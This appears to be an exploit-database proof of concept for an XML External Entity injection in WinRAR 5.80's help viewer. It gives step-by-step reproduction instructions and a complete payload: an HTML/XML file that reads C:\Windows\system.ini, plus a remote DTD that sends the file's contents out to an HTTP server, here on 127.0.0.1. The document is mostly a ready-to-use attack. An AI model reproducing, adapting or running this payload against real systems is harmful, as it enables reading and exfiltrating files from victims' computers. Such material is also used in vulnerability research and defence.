Share
# Exploit Title: winrar External Entity Injection  
# Exploit Author: albalawi-s  
# Vendor Homepage: https://win-rar.com  
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe  
# Version: 5.80  
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit  
  
#https://twitter.com/test_app_______  
  
#poc video   
  
https://www.youtube.com/watch?v=XpFvSHeVB7E  
  
# POC  
=====================================================  
1- python -m SimpleHTTPServer 8000  
2- open winrar or any file.rar  
3- help  
4- help topics  
5- Drag the html file to the window  
  
  
html file  
  
<htmlL>  
<body>  
<xml>  
<?xml version="1.0"?>  
<!DOCTYPE flavios [   
<!ENTITY % file SYSTEM "C:\Windows\system.ini">  
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/start.dtd">  
%dtd;]>  
<pwn>&send;</pwn>  
</xml>  
</body>  
</html>  
  
==============================  
start.dtd  
  
<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">  
%all;